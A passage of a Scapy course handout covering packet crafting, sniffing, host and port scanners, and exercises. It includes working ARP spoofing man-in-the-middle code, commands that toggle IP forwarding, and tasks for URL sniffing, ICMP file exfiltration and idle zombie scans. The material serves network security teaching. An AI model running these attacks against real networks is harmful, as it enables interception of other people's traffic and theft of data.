215 | P a g e Scapy Working with Python, we would use the following: from scapy.all import * str(IP()) a = Ether()/IP(dst="www.google.com")/TCP()/"GET /index.html HTTP/1.1" hexdump(a) Basic commands ls() - list of supported protocols ls(IP) - list of the fields in the protocol packets lsc() - show all Scapy commands Assembling and sending raw packets requires root access. Packets Crafting packet = Ether()/IP(dst='8.8.8.8')/TCP(dport=53,flags='S’) packet.show() #get the full details of your packet p2 = Ether() p3 = IP(dst='8.8.8.8/30') p4 = TCP(dport=53, flags = 'S') packet = p2/p3/p4 IP(dst="192.168.10.1-10")/TCP(dport=(0,1024)) Checking and Configuring packets pkts=sniff() pkts[0].show() pkts[0].summary() packet = Ether()/IP(dst='8.8.8.8')/TCP(dport=53,flags='S’) packet.dst #of the first dst packet[IP].dst #of the IP destination Sending Packets send() Send packets at Layer 3 (Scapy creates Layer 2 header) without receiving any packets. send(IP(dst=['8.8.8.8', '8.8.8.4'])/TCP(dport=53, flags='S’)) 216 | P a g e send(IP(dst='8.8.8.8')/TCP(dport=53, flags='S'), count=10) send(IP(dst='8.8.8.8')/TCP(dport=53, flags='S'), loop=1) answer = sr1(IP(dst="8.8.8.8")/UDP(dport=53)/DNS(qd=DNSQR(qname="cnn.com"))) sendp() sends packets at Layer 2(Must provide Layer 2 header), Does not receive any packets. sendp(Ether()/IP(dst="1.2.3.4"), iface="eth0") Send and Receive sr() Sends & receive packets at layer 3. sr(IP(dst="192.168.8.1")/TCP(dport=[21,22,23])) ans,unans=_ ans.summary() sr1() p=sr1(IP(dst="scanme.nmap.org")/ICMP()/"XXXXXXXXXXX") srp() Sends & receive packets at layer 2. print srp.__doc__ Reading packets pkts = rdpcap(“file.pcap") Exporting packets wrpcap(“new.pcap”,pkts) hexdump(pkts) #Use hexdump() function to display one or more packets using classic hexdump format. pktstr=str(pkt) #Convert the packet into hex string export_object(pkt) #base64 encoded pkt.psddump() #dump as psd pkt.pdfdump() #dump as pdf 217 | P a g e Sniffing with Scapy With this function we can sniff the traffic. sniff(iface=”eth0”, count=10, filter=“icmp”) sniff() - sniff Network traffic into PCAP P = sniff() To view information we will use show() print P.show() filter="tcp and host 64.233.167.99 and port 80“ Monitoring DNS from scapy.all import * def findDNS(p): if p.haslayer(DNS): print p.summary() #mor efficient print p.display() #print p[IP].src,p[DNS].summary() sniff(prn=findDNS) Creating Scanners ans,unans=sr( IP(dst="192.168.1.*")/TCP(dport=80,flags="S") ) #SYN/ACK or RST in response indicates that a machine is up and running. ans, unans = sr(IP(dst='192.168.56.99-105')/TCP(dport=80, flags='A’)) #ACK packets should be responded with RST which reveals a machine. UDP Scan Send UDP packet to the given ports with or without payload, though protocol specific payload makes the scan more effective. Choose a port that’s most likely closed(Open UDP ports might receive empty packets but ignore them). ARP Scan ans,unans=srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst="192.168.56.0/24"),timeout=2) ICMP Scan ans,unans=sr(IP(dst="192.168.56.99-110")/ICMP()) ARP Send ARP requests to determine which hosts are up arping("192.168.230.0/24") # help(arping) ans.summary( lambda(s,r) : r.sprintf("{IP: %IP.src% is alive}") ) 218 | P a g e sprintf() Make your own summary of a packet and abstract lower layers. a = IP(dst="192.168.8.1",ttl=12)/UDP(dport=123) a.sprintf("The source is %IP.src%") Port Scanner syn_packet = IP(dst='192.168.56.102')/TCP(dport=4444,flags='S') resp = sr1(syn_packet) resp.sprintf('%TCP.src% \t %TCP.sport% \t %TCP.flags%’) # ‘SA’ flags indicates open ports, ‘RA’ flags indicates closed ports ARP Spoofing (MiTM) IP forwarding import os os.system('echo 1 > /proc/sys/net/ipv4/ip_forward') # enable kernel IP forwarding os.system('echo 0 > /proc/sys/net/ipv4/ip_forward') # disable kernel IP forwarding send(ARP(op = 2, pdst = victimIP, hwdst= victimMac, psrc = gatewayIP)) send(ARP(op = 2, pdst = gatewayIP, hwdst= gatewayMAC, psrc = victimIP)) Restoring to normal mode: victimMAC = MACsnag(victimIP) routerMAC = MACsnag(routerIP) send(ARP(op = 2, pdst = routerIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc= victimMAC), count = 4) send(ARP(op = 2, pdst = victimIP, psrc = routerIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = routerMAC), count = 4) Ex: 1. Infect your ARP table and capture the packet using Wireshark 2. Insert your code into Python and add a loop to send that data every 10 seconds 3. Create a MiTM attack, and sniff the urls using urlsnarf 4. Create URLSnarf and arpspoof 219 | P a g e Scapy Exercise 1. Create a spoofed packet, check on Wireshark. 2. What port does this packet get sent to: send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP()) 3. Write a script that perform network scanning using ICMP, ARP, SYN Scans by using a given IP range. 4. Write a script to perform port scanning using given IP address for ports 1-1024. 5. Send packets to target IP address, save the packets in a PCAP file. 6. Given a PCAP file, find all the unique hosts in that PCAP file and try and determine their OS. 7. Spoof your OS as Windows XP. 8. What is the different in packets with NMAP and SCAPY using your scanners. 9. Perform a MiTM attack: 10. Check ARP cache 11. Capture Data 12. Reset the situation 13. Create MiTM IDS. 14. Send a file over ICMP packets. 15. Send a query to DNS and extract your answer. 16. What ARP request does arping sends? 17. Extract the live hosts data and save it in a file. 18. Read about the ICMP protocol: what 'code' does a ping uses? 19. What port does this packet get sent to: send(IP(dst="target",options="\x02\x27"+"X"*38)/TCP()) Exercise 1 - Network sweeping Write a script to perform network sweeping i.e. given a IP address range, find all the machines that are alive. Use any of the host discovery techniques that have been discussed but ARP tends to be neat and faster on local networks. Exercise 2 - Port scanning Write a script to perform port scanning i.e. given an IP address, find status of ports on the machine (atleast find any open ports under 1024). Use any of the port scanning techniques that have been discussed. Exercise 3 - IP ID pattern finder Write a script that takes a target IP and checks for patterns in the IP ID generation. Basic checks include: if the IP IDs generated are: all zeros, are all constant, are all randomized or if they are incremental. Exercise 4 - IP ID scanner 220 | P a g e Your might have found a potential ‘zombie’ from the previous scan. Write a script that takes a zombie_ip, victim_ip. victim_port Performs a ipid scan.(Details in the notes) Exercise 5 - Packet hunting You are given a PCAP ‘boston2016’, this PCAP is suspected to be having covert channel activity. (someone trying to transfer data in packet using unsual methods). Your task is to analyze this packet capture and find out the hidden data. Exercise 6 - Packet analysis Given a pcap file, find all the unique hosts in that pcap file and try and determine their OS. Exercise 7 - Dummy network scanner A client wants you to do a security audit on their network. Client provided you with a network range to scan and set of IP addresses to exclude from scan. Before you run an actual network scan, write a script that lists all the IP addresses that falls under scan (similar to Nmap list scan). (Network range provided by client minus IP addresses to be excluded) Exercise 8 - Local network interface enumeration. Use a python library to list all the interfaces on your machine, find as much as you can (interface labels, addressing etc). When you print the output, make sure it’s easily readable.
Enter the password to open this PDF file:
-
-
-
-
-
-
-
-
-
-
-
-